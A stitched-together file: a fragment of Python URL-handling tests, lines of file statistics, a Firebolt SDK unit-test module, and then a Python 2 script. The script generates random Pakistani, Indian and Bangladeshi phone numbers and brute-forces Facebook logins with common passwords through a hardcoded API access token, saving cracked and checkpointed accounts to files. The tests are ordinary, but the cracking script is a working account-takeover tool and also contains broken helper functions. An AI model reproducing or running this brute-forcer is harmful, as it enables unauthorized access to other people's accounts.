ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.hello.world"
# Value in list
allowed_urls = ["https://foo.hello.world","https://foo.bar.baz", "https://alice.bob.eve"]
request_url = "https://foo.bar.baz"
ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.bar.baz"
# Trailing /
allowed_urls = ["https://foo.bar.baz", "https://alice.bob.eve"]
request_url = "https://foo.bar.baz/"
ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.bar.baz"
#include path
allowed_urls = ["https://foo.bar.baz", "https://foo.bar.baz/wms/"]
request_url = "https://foo.bar.baz/wms/"
ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.bar.baz/wms"
# use value from list instead of request
allowed_urls = ["https://foo.bar.baz", "https://foo.bar.baz/wms/"]
request_url = "http://foo.bar.baz/wms/"
ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.bar.baz/wms"
def test_parse_for_base_url():
url = "https://hello.world.bar:8000/wms/?CheckSomething"
ret = datacube_ows.ogc_utils.parse_for_base_url(url)
assert ret == "hello.world.bar:8000/wms"
| 39.021277
| 93
| 0.690294
| 280
| 1,834
| 4.275
| 0.157143
| 0.133668
| 0.120301
| 0.175439
| 0.868003
| 0.786132
| 0.781955
| 0.745196
| 0.745196
| 0.686717
| 0
| 0.005128
| 0.1494
| 1,834
| 47
| 94
| 39.021277
| 0.762179
| 0.056707
| 0
| 0.548387
| 0
| 0
| 0.337587
| 0.013921
| 0
| 0
| 0
| 0
| 0.225806
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50bea0cb3bd11757b1e0a45ac25695fe12634209
| 14,799
|
py
|
Python
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 4
|
2022-01-29T19:21:52.000Z
|
2022-03-25T20:48:14.000Z
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 92
|
2021-11-19T18:15:15.000Z
|
2022-03-30T11:52:06.000Z
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 6
|
2021-11-22T22:04:20.000Z
|
2022-02-18T15:30:23.000Z
|
from typing import Callable, List
from pydantic import ValidationError
from pytest import raises
from pytest_httpx import HTTPXMock
from firebolt.common import Settings
from firebolt.model.engine import Engine, _EngineCreateRequest
from firebolt.model.engine_revision import EngineRevision
from firebolt.model.instance_type import InstanceType
from firebolt.model.region import Region
from firebolt.service.manager import ResourceManager
from firebolt.utils.exception import FireboltError, NoAttachedDatabaseError
def test_engine_create(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
mock_regions,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
manager = ResourceManager(settings=settings)
engine = manager.engines.create(name=engine_name)
assert engine.name == engine_name
def test_engine_create_with_kwargs(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
account_id: str,
mock_engine_revision: EngineRevision,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
# Setting to manager.engines.create defaults
mock_engine.key = None
mock_engine.description = ""
mock_engine.endpoint = None
# Testing kwargs
mock_engine.settings.minimum_logging_level = "ENGINE_SETTINGS_LOGGING_LEVEL_DEBUG"
mock_engine_revision.specification.proxy_version = "0.2.3"
engine_content = _EngineCreateRequest(
account_id=account_id, engine=mock_engine, engine_revision=mock_engine_revision
)
httpx_mock.add_callback(
engine_callback,
url=engine_url,
method="POST",
match_content=engine_content.json(by_alias=True).encode("ascii"),
)
manager = ResourceManager(settings=settings)
engine_settings_kwargs = {
"minimum_logging_level": "ENGINE_SETTINGS_LOGGING_LEVEL_DEBUG"
}
revision_spec_kwargs = {"proxy_version": "0.2.3"}
engine = manager.engines.create(
name=engine_name,
engine_settings_kwargs=engine_settings_kwargs,
revision_spec_kwargs=revision_spec_kwargs,
)
assert engine.name == engine_name
def test_engine_create_with_kwargs_fail(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
manager = ResourceManager(settings=settings)
revision_spec_kwargs = {"incorrect_kwarg": "val"}
with raises(ValidationError):
manager.engines.create(
name=engine_name, revision_spec_kwargs=revision_spec_kwargs
)
engine_settings_kwargs = {"incorrect_kwarg": "val"}
with raises(TypeError):
manager.engines.create(
name=engine_name, engine_settings_kwargs=engine_settings_kwargs
)
def test_engine_create_no_available_types(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_empty_callback: Callable,
instance_type_region_2_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_url: str,
region_2: Region,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_empty_callback, url=instance_type_region_2_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
manager = ResourceManager(settings=settings)
with raises(FireboltError):
manager.engines.create(name=engine_name, region=region_2)
def test_engine_no_attached_database(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
mock_regions,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
account_engine_callback: Callable,
account_engine_url: str,
database_callback: Callable,
database_url: str,
no_bindings_callback: Callable,
bindings_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
httpx_mock.add_callback(no_bindings_callback, url=bindings_url)
manager = ResourceManager(settings=settings)
engine = manager.engines.create(name=engine_name)
with raises(NoAttachedDatabaseError):
engine.start()
def test_engine_start_binding_to_missing_database(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
mock_regions,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
database_not_found_callback: Callable,
database_url: str,
bindings_callback: Callable,
bindings_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
httpx_mock.add_callback(bindings_callback, url=bindings_url)
httpx_mock.add_callback(database_not_found_callback, url=database_url)
manager = ResourceManager(settings=settings)
engine = manager.engines.create(name=engine_name)
with raises(NoAttachedDatabaseError):
engine.start()
def test_get_connection(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
mock_regions,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
db_name: str,
database_callback: Callable,
database_url: str,
bindings_callback: Callable,
bindings_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(region_callback, url=region_url)
httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
httpx_mock.add_callback(bindings_callback, url=bindings_url)
httpx_mock.add_callback(database_callback, url=database_url)
manager = ResourceManager(settings=settings)
engine = manager.engines.create(name=engine_name)
with engine.get_connection() as connection:
assert connection
def test_attach_to_database(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
region_callback: Callable,
region_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
settings: Settings,
account_id_callback: Callable,
account_id_url: str,
create_databases_callback: Callable,
databases_url: str,
database_get_callback: Callable,
database_get_url: str,
database_not_found_callback: Callable,
database_url: str,
db_name: str,
engine_name: str,
engine_callback: Callable,
engine_url: str,
create_binding_callback: Callable,
create_binding_url: str,
bindings_callback: Callable,
bindings_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(
instance_type_region_1_callback, url=instance_type_region_1_url
)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(bindings_callback, url=bindings_url)
httpx_mock.add_callback(create_databases_callback, url=databases_url, method="POST")
httpx_mock.add_callback(database_not_found_callback, url=database_url, method="GET")
# create engine
httpx_mock.add_callback(region_callback, url=region_url)
httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
# attach
httpx_mock.add_callback(database_get_callback, url=database_get_url)
httpx_mock.add_callback(
create_binding_callback, url=create_binding_url, method="POST"
)
manager = ResourceManager(settings=settings)
database = manager.databases.create(name=db_name)
engine = manager.engines.create(name=engine_name)
engine.attach_to_database(database=database)
assert engine.database == database
def test_engine_update(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
instance_type_region_1_callback: Callable,
instance_type_region_1_url: str,
region_callback: Callable,
region_url: str,
settings: Settings,
mock_instance_types: List[InstanceType],
mock_regions,
mock_engine: Engine,
engine_name: str,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
engine_url: str,
account_engine_url: str,
account_engine_callback: Callable,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
#
httpx_mock.add_callback(
account_engine_callback, url=account_engine_url, method="PATCH"
)
manager = ResourceManager(settings=settings)
mock_engine._service = manager.engines
engine = mock_engine.update(
name="new_engine_name", description="new engine description"
)
assert engine.name == "new_engine_name"
assert engine.description == "new engine description"
def test_engine_restart(
httpx_mock: HTTPXMock,
auth_callback: Callable,
auth_url: str,
provider_callback: Callable,
provider_url: str,
settings: Settings,
mock_engine: Engine,
account_id_callback: Callable,
account_id_url: str,
engine_callback: Callable,
account_engine_url: str,
bindings_callback: Callable,
bindings_url: str,
database_callback: Callable,
database_url: str,
):
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(provider_callback, url=provider_url)
httpx_mock.add_callback(account_id_callback, url=account_id_url)
httpx_mock.add_callback(auth_callback, url=auth_url)
httpx_mock.add_callback(
engine_callback, url=f"{account_engine_url}:restart", method="POST"
)
httpx_mock.add_callback(bindings_callback, url=bindings_url)
httpx_mock.add_callback(database_callback, url=database_url)
manager = ResourceManager(settings=settings)
mock_engine._service = manager.engines
engine = mock_engine.restart(wait_for_startup=False)
assert engine.name == mock_engine.name
| 33.107383
| 88
| 0.757416
| 1,889
| 14,799
| 5.519322
| 0.058232
| 0.073374
| 0.086323
| 0.143871
| 0.829944
| 0.805486
| 0.778247
| 0.75705
| 0.722808
| 0.717533
| 0
| 0.003243
| 0.166498
| 14,799
| 446
| 89
| 33.181614
| 0.841994
| 0.005271
| 0
| 0.751282
| 0
| 0
| 0.020455
| 0.008087
| 0
| 0
| 0
| 0
| 0.017949
| 1
| 0.025641
| false
| 0
| 0.028205
| 0
| 0.053846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50f90069509f783e543ca35adc39f8104e465db7
| 22,700
|
py
|
Python
|
hcrack/.no_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
hcrack/.no_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
hcrack/.no_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
#!/usr/bin/python
# coding=utf-8
# Originally Written By:Muhammad Hamza
# Source : Python2"
# Donot Recode It.
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(2000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system("pip2 install tqdm")
try:
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass,mechanize,requests
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
except ImportError:
os.system('pip2 install requests')
os.system('pip2 install mechanize')
os.system('pip2 install tqdm')
#Browser Setting
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exit():
print "[!] Exit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def hamza(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
from tqdm import tqdm
def load():
with tqdm(total=100, desc="Loading ",bar_format="{l_bar}{bar}") as pbar:
for i in range(100):
time.sleep(0.030)
pbar.update(1)
##### LOGO #####
banner = """
╔╗─╔╗╔═══╗╔═╗╔═╗╔════╗╔═══╗
║║─║║║╔═╗║║║╚╝║║╚══╗═║║╔═╗║
║╚═╝║║║─║║║╔╗╔╗║──╔╝╔╝║║─║║
║╔═╗║║╚═╝║║║║║║║─╔╝╔╝─║╚═╝║
║║─║║║╔═╗║║║║║║║╔╝═╚═╗║╔═╗║
╚╝─╚╝╚╝─╚╝╚╝╚╝╚╝╚════╝╚╝─╚╝
-----------------------------------------------
➣ Coder : Muhammad Hamza
➣ Github : https://github.com/Hamzahash
➣ Facebook: Muhammad Hamza
➣ Youtube : HOP Anonymous
-----------------------------------------------"""
back = 0
threads = []
successful = []
checkpoint = []
oks = []
gagal = []
idh = []
id = []
def crack_no():
os.system('clear')
print banner
print
print "[1] Clone From Pakistan"
print "[2] Clone From India"
print "[3] Clone From Bangladesh"
print "[4] Clone From USA"
print "[0] Back To Main Menu"
print
crack_no_action()
def crack_no_action():
no = raw_input('Choose Country >>> ')
if no =="":
print "Wrong Input"
time.sleep(1)
crack_no_action()
elif no =="1":
pakistan()
elif no =="2":
india()
elif no =="3":
bangladesh()
elif no =="4":
usa()
elif no =="0":
os.system('python2 .hop2.py')
else:
print "Wrong Input"
time.sleep(1)
crack_no_action()
def pakistan():
os.system("clear")
print banner
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="0"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN PAKISTAN ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/pakistan.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/pakistan.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass3
oka = open('save/pakistan.txt', 'a')
oka.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def india():
os.system("clear")
print banner
print
print("Useful Codes : 755 855 935 965 975 995")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def bangladesh():
os.system("clear")
print banner
print
print "Useful Codes : 191 To 199"
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN Bangladesh ####
def main(arg):
global checkpoint,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/bang.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/bangla.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = 'allah786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/bang.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
